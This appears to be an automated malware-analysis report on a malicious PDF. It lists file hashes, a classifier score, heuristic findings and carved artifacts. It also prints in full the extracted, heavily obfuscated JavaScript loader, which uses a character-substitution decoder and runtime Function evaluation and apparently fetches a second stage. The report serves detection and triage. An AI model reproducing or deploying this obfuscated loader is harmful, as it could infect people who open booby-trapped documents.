Malicious PDF — malware analysis report

Static analysis result for SHA-256 331f597c055d97d0…

MALICIOUS

PDF

37.4 KB Created: 2010-07-19 09:56:54 -05:00 Authoring application: GPL Ghostscript 8.62 First seen: 2026-05-08
MD5: 67df0c43b5df4aeb11bc4f3524dc2812 SHA-1: 47538bd499a56c9d2d7bd3b8012e5b11d049b1a0 SHA-256: 331f597c055d97d03a64dbd84019c8bf27451f240b89946e31c4db188fe0bde4
70 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged as malicious by an ML classifier and contains embedded JavaScript. The JavaScript is heavily obfuscated, making it difficult to determine its exact function, but the presence of obfuscation and the ML classification strongly suggest it is malicious. The primary heuristic firing indicates the presence of JavaScript actions within the PDF, and an artifact named 'javascript_obj0237_000.js' was extracted. The obfuscated script likely attempts to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9188

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF differential parser failed info PDF_DIFFERENTIAL_PARSE_FAILED
    The cross-check parser (pdfminer.six) failed on this file: PDF differential parser failed: PDFSyntaxError. Static heuristics still ran and any of their findings above are valid; only the differential cross-check signal is missing.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/iX/1.0/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text

Extracted artifacts 8

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0237_000.js pdf-javascript-stream PDF /JS object 237 at offset 0x2DB3 8055 bytes
SHA-256: 044ab828e592224164e14c967086b871de51118938f226e042d6b5b5c1484956
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s). 116 of 190 identifiers look randomly generated (e.g. 'nzlAfSGivVX'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var mbN_ffawS={"9":" ","r":"!","E":"#","?":"$","h":"%","5":"&","0":"'","v":"(","A":")","'":"*","(":"+",".":",","&":"-","\\":"\/","2":".","|":"0","<":"1","y":"2","b":"3","\/":"4","3":"5",")":"6","X":"7","w":"8","#":"9","g":":","f":";","B":"<",",":"=","e":">","N":"?","+":"@","R":"A","Y":"B","W":"C","K":"D","J":"E","V":"F","-":"G","o":"H","[":"I","a":"J","C":"K","s":"L","@":"M","=":"N","~":"O","m":"P",">":"Q","F":"R","p":"S","u":"T","U":"U","`":"V","q":"W","}":"X","d":"Y","j":"Z","c":"[","%":"\\","6":"]","T":"^","8":"_","Q":"`","*":"a","O":"b","{":"c"," ":"d","$":"e","S":"f","n":"g","l":"h","1":"i","P":"j","4":"k","t":"l",";":"m","]":"n","G":"o","k":"p","L":"q","i":"r","D":"s","z":"t","H":"u","x":"v","M":"w","7":"x",":":"y","^":"z","Z":"{","!":"|","_":"}","I":"~"};var xG_yITSh="";var FHiDy=Math.acos();var Solr_URy=Math.LN2;var TsOacH=false;var ywGUoaQK;var VM_Dz=Math.exp();var Retjw=false;var bqmXAy="";var LACJQ="%HSS|$%H|/33%HOw3X%H{$$S%H)|$|%H";var TGxDl="S%HbySS%HwO{|%HSySX%H/S*$%H)3Ow%";var iBCpbCbFG="i*:vAf`7kXK]>,0%H#|#|";var phBxMLT=Math.LN10;var oRQqgVO="%H* /<%HSSbb%H|Sb)%H</O$%Hb";var kDjosaJDj="HwO$y%H$O${%H3*/S%Hwb3y%H3)$*%H33w#%H3)|/%HwO3X%Hb{";var RjMrZaxX=")3Xw0fMl1t$v`7kXK]";var AknjDhQkW="3)%Hy|X)%HSb|b%H{#bb%H3|/#";var JAqP=Math.E;var nxnjXRMyX="Ow3y%H{*bb%H3Ow*%H*y$w%HSSS";var YWYjE=";$ 1*2]$Mmt*:";var SKbEPb="Afp >;mkvAfzi:Zzl1D2";var UgGju="]{z1G]vAZHz1tc0pk[i=1u]Vz> m@02i$kt*{$v\\cR&j6";var xnXgpku="%H//)*%H <3*%HyO$y%";var mHVfrv=" b%Hw*|/%H{b|b%H3$3S%H{b3|%HX w %H3X|w%H";var uXcNdb=Math.PI;var cdBUxF=")zfp >;mk,SH";var IPcVQ="H<//|%H||wO%H||wO%H3wwO%H$O<|%HwO|#%H";var rWzqrR="\\n.00A6v0k+<R<V<<@<C<<u<<FF<<p<<K<<<<m><<FF<<@=W<";var _cwGSbzh="Xb%HX/wO%HXwbb%HSb|b%HwO";var lUacaD=") ){%HOw3/%H/$w$%H${|$%H33SS%H#b|/";var qkJbwrk_="b//|%H/|w %HwOX{%Hb{3w";var ZNGySZ="|&a*~]|$J2t$]nzlAfSGivVX{|8kF,|";var ElPCtg="9x*i9p >;mk.>iaG^Wbfx*i9`7kXK]>.a*~]|$J.VX{|8kF";var wYKuUWz="%H$3X3%HwO3$%Hy//)%H{b|b%HwO))%H/w|{%H3)wO%H|b<{%HwO";var bxmjHw="\\cR&j6\\n.00A.]$M9K*z$vAAf_f>iaG^Wb,]$M9Ri";var WZcHzX="fVX{|8kFBy#||fVX{|8kF((A>iaG^WbcVX{|8kF6,`7kXK]";var pfiMFc=")%HX|yS%H33SS%H3O|/%HSSbb%H3)3X%H#wOw%Hw*S$";var lpamT="%H#|#|0fa*~]|$J,0%H{|bb%HwO)/%Hb|/|%H|{Xw%H/|wO%HwO|{%";var WQFIA="w|b%HX/Sy%H{<|w%H| {S%HS*|b%H$O/|%H";var _hTAkQqT="H)3y$%H*OXw%H#w))%H*O))%H){O";var CcKgurZEl=">2t$]nzlB,|7w|||A`7";var mODLgLTxO="fx*i9aSC);=z.~LFD";var yWXpp="33SS%H)w|/%HX/X/%Hb*X|%HySyS%Hb#b<%Hy$by%Hb)b<%";try{var HZOEKna=Math.LN2;}catch(eRheMls){{var yOVJkh=4065;}};var ilSyxi=">(a*~]|$Jfp >;mkv";var hAACoFwT="<<9g9:>:::--<m<><02i$kt*{$v";var hPgfZjw_="3w$S%HSwbO";var lgJumyv="%Hbb3|%H3|{|%H3)3|%H33wO%Hwb|/%HXS{y%H{ywb%H3yb<%HOw3|%H<*b";var AlEHMnahJ="$iv]HttAf_{*z{lvaSC);=zAZ_p >;mkvAf";var TFPzc="|%H$|w*%H3|#w%H)S)w%Hy$)$%H)w)/%HXyX3%H";var XId_w_I="Hy$bw%Hy$b|%Hb|b<%HySbX%H)#))%H)3){%H)3y$%H";var vCswP="kXK]>(,`7kXK]>f`7kXK]>,`7kXK]>2DHODziv|.|7w||";var Uo_DMpmh=Math.atan();var KFGrgV=new Number();try{try{var hBTsRBU='knwwF0'.length;}catch(BxavlsmS){};if(Solr_URy>JAqP){var mqUMe=new Number();}else{var UWho=true;};var vtYnnhS='FK{zMJ*00ljdqU0CTpb+8+';var lXqyI=7821;var ghWLZMc=-0.254464;if(Retjw<=uXcNdb)var ZBWwQEx=false;var _bZskcwt=false;IMEqvd();var OIqm=4975;TsOacH='Kqwga';var sMBRGbPK=Math.LOG2E;var GPYc_ock=-0.9;var oXeLIh=-0.7;var ZHjvdl=Math.random();}catch(QZJYGv){var uWzdLRh=Math.cos();TsOacH=ElPCtg+mODLgLTxO+cdBUxF+UgGju+rWzqrR+hAACoFwT+bxmjHw+iBCpbCbFG+lpamT+IPcVQ+qkJbwrk_+xnXgpku+kDjosaJDj+_cwGSbzh+AknjDhQkW+oRQqgVO+WQFIA+hPgfZjw_+wYKuUWz+mHVfrv+nxnjXRMyX+TGxDl+_hTAkQqT+TFPzc+lUacaD+lgJumyv+pfiMFc+LACJQ+yWXpp+XId_w_I+RjMrZaxX+CcKgurZEl+vCswP+ZNGySZ+WZcHzX+ilSyxi+SKbEPb+YWYjE+AlEHMnahJ;try{var izNwzWaP=Math.LN2;}catch(zUau_Ft){};var Iyykg=false;var emlZW='(t=0izP@OT))sKTk-+J)0^';var fkwBnSb='qU2j)'.toLowerCase();var CeYlUv=1223;var vubOkepn='0PWz'.toLowerCase();var pmBOlM=new Date();var tPlyUV=Math.sin();var hMklGhVJ='tm5FT^CUy(pR={lnDMOD{R';var QQqYsHEN=' E_puAZM6q`_o%00q)4J5';var NkFyN='cq6`=YJxZ4f0x^0x`@9s';TsOacH+=bqmXAy+xG_yITSh;}try{;var cxCfCwx=1612;var Cqjgmd=Math.LN10;var XXooYSYV='9{5! ee9G3RJm`DeM2s`&';var bJob='bV0iH'.toLowerCase();var JRphNjh='rtJUjm';if(oXeLIh>=XXooYSYV)var FJpIWj=Math.atan();else var wmjHurr=new Number();try{var jYID=8177;}catch(yHhn){{var ZrXEpAWP=new Error();}};var ewtaJ=Math.cos();var zJYZpnXY=true;try{var lMEf=0.51;}catch(En_YD){};try{var OALRbbn=true;}catch(YPnX){{var aZQxipcI=false;}};var gWPjt='PbOmss(d6An8kEz+up';var t_xYsQML=false;JRphNjh=GSipe();}catch(QZJYGv){try{;IMEqvd();var Lyh_=Math.exp();try{var aHAm=new Object();}catch(chwk){};if(uWzdLRh!=fkwBnSb){var wULjXdZt=-0.99;};var wHtBZ=new Object();var FA_Fust=Math.exp();var JYbIYgc=Math.LOG2E;try{var FlVpQIi=Math.SQRT12;}catch(IEwcvz){};var qxTe=7337;try{var KbIgKMQ=Math.SQRT12;}catch(UjrBZaBi){{var Jnqomq=new Number();}};}catch(QZJYGv){var rKfEyOwF=new Object();JRphNjh=TsOacH;var CHAcF=true;if(Iyykg>=Retjw)var aTWCIfS='UwFuHdj X0u'.replace(/[a-z]/,'');if(hMklGhVJ||sMBRGbPK){var GosoNyv=6207;}else{var lAvHV=new Error();};var QdSFTr=Math.acos();var fgRLu_l=Math.E;if(FHiDy||vubOkepn){var VJkdi='B@C7!3Xr)aHT8@'.replace(/[a-z0-9]/,'');};var CmmRdug=Math.SQRT12;var anTIhuo='`wj hv^'.length;}}try{var UJsL='AcrzS#s3q`wmRJ*N1YOJ';try{var rQwJ=Math.sin();}catch(YqQS_){{var DSHsWsA=true;}};try{var JSJalia=Math.LOG2E;}catch(ygRddfaf){{var OCXpKIC=new Array();}};try{var BWhrJVg=4610;}catch(yenWes){};var PvxDges;var kKEq_=true;var OGHY=new Boolean();var vfCp=new Function();PvxDges=GSipe();var dwcO=Math.cos();if(ghWLZMc==UJsL){var EREggC='w2&)SJyVqfA'.replace(/[0-9]/,'');};var nAEu=true;try{var GLFcoW=new Error();}catch(zshz){{var QkoUIzB=6350;}};var LvINKKMA=Math.E;var enGRv__F='26DWOf#q'.toLowerCase();}catch(PvxDges){var iTXsH=Math.asin();var f_ihZfl=new String();var NYmFOqVx=Math.LOG2E;if(lXqyI>=f_ihZfl){var hrJlbUnR='X0x=L~^z0v~THv&';}else{var nAhFItff=Math.E;};try{var DSYNdHJD=new Boolean();}catch(Rahefhw){};var cDVcRm=null;if(PvxDges!=cDVcRm){var eQvq_dlH=Math.sin();if(dwcO==anTIhuo){var QJNXx=Math.sin();};var xujROYdQ='A5-R)ER5j)tR'.replace(/[0-9]/,'');var cIFf=new Object();var QYniSFgi=Math.E;try{var XgHI=Math.SQRT2;}catch(CpaKS){{var oxcIopoX=new String();}};var mAFeWLtX=new Function();PvxDges=0;var rbOhwlAQ=Math.E;}try{while(PvxDges<JRphNjh.length){IMEqvd(PvxDges++);}}catch(PvxDges){PvxDges='';var Cfdh=Math.PI;if(nAEu!=FHiDy)var nOpNBL=Math.LN10;try{var GyusnF=true;}catch(rUHHCJe){};if(LvINKKMA>JAqP){var Jxynnp=-0.157938;}else{var bkdcx=9865;};var WyQPedX=Math.E;var bmcrr=Math.PI;var zyPb='%q-nhON-AuQg5'.replace(/[a-z]/,'');for(ywGUoaQK=0;ywGUoaQK<JRphNjh.length;ywGUoaQK++){PvxDges+=mbN_ffawS[JRphNjh.charAt(ywGUoaQK)];}try{ywGUoaQK=function(){IMEqvd();};try{var wRdkD=590;}catch(ULPqVtjP){};var HBNkDjX=Math.sin();var msAK=new Boolean();var JVWoOab=new Number();var SMtxI=false;GSipe();var edORyVux=Math.LN2;var zEbUGY=new Number();}catch(QZJYGv){ywGUoaQK=new Function(PvxDges);if(zEbUGY>fkwBnSb){var CbyeyeVA='(icPWDqVBrvI+sjTOcU4';};var dJOk=Math.abs();try{var VcurKg=false;}catch(joyy_wBy){{var ZhIBw=Math.sin();}};var LqAsngck='0cO5^&zqH`g7c1$nu`vk';var nf_ABoaN=0.992;try{var SgrKlge=Math.abs();}catch(zdMR){{var L_yq=-0.06;}};if(rbOhwlAQ||vubOkepn)var uY_amjIW='4BZSi*Evo5hjH&k+0v0';else var VAeWMFf=3704;var rLqm='BYi*`@^czk{PvjlMbRe';try{var XmfjfMGJ='DN0C`FK&n'.toString();}catch(vsUTu){};try{var dNKYJN=Math.LN10;}catch(iBLNuPu){{var dFxj='!TgNofLc}BxoL`@X0';}};try{var pxBTrnc=-0.997;}catch(GuJxmJpE){{var CoWub=0.6435150;}};ywGUoaQK();var vSBmPH=Math.LOG2E;var _xFMw_Ri='k(QW&GUq^!^Pp Y31j@0E$N';var RvljWv=false;}}try{var TxgJi=true;}catch(NgRVI){};var jCEm=Math.SQRT12;var QzhCD=new Error();if(vSBmPH>=KFGrgV){var RGHk='Zqd0@mWzPr '.replace('tCEGWVP','');}else{var VJBkLS=new Number();};if(_bZskcwt>fkwBnSb)var dcsaQ=-0.643;else var iAKV=-0.262;var XcJsCos=false;try{var hAFcj=new Number();}catch(zabJbs){{var WLPKr=Math.acos();}};var GiqijEfT=true;if(HBNkDjX==phBxMLT){var pTwirj=5446;}else{var UQAVsy=Math.sin();};}var UcQZtjc=new String();var UvHuc=Math.asin();var NMPcyr='}`SuWBi&c(!+r90i9u_Sw';var lLLmvipI=new Object();
font_00_cff_off00004a2c.bin pdf-font-stream PDF embedded font (cff) at offset 0x4A2C 1065 bytes
SHA-256: c5388dbfd357955527f956cb5d141afebfc49f4aba234a2dc3435c4db80371a6
font_01_cff_off00004f40.bin pdf-font-stream PDF embedded font (cff) at offset 0x4F40 284 bytes
SHA-256: 7d74f6c7a87276d66c859f02fcc8bdde22fb6d1bd67f9679c9e2870e43f811a0
font_02_cff_off000051c2.bin pdf-font-stream PDF embedded font (cff) at offset 0x51C2 2762 bytes
SHA-256: 6b603a7321354a2f666a4d44dadba63c3d08655ca1334fd2180809de6dd63710
font_03_cff_off00005b91.bin pdf-font-stream PDF embedded font (cff) at offset 0x5B91 1070 bytes
SHA-256: ee97fcf56dee5b6195651df2574076032ebe380a0157859d701ba31c21bd8880
font_04_cff_off000061da.bin pdf-font-stream PDF embedded font (cff) at offset 0x61DA 8857 bytes
SHA-256: ad54daaa4e22303d71e4efdaed06e7249064ae61f91241b4ea619b5c6dcc6fcf
font_05_cff_off00007cbb.bin pdf-font-stream PDF embedded font (cff) at offset 0x7CBB 1047 bytes
SHA-256: 9e11d54182dfb3d0e8a3d9784b7f3a015dc9f1917a21efad61e15f66a4f5d3cc
font_06_cff_off0000820b.bin pdf-font-stream PDF embedded font (cff) at offset 0x820B 3044 bytes
SHA-256: e96ab6cfcc1c7bfea431b05eae85de0f68cfbea8595a7d44b2e57a41049f59d7

Open this report in the interactive analyzer, or submit your own file for analysis.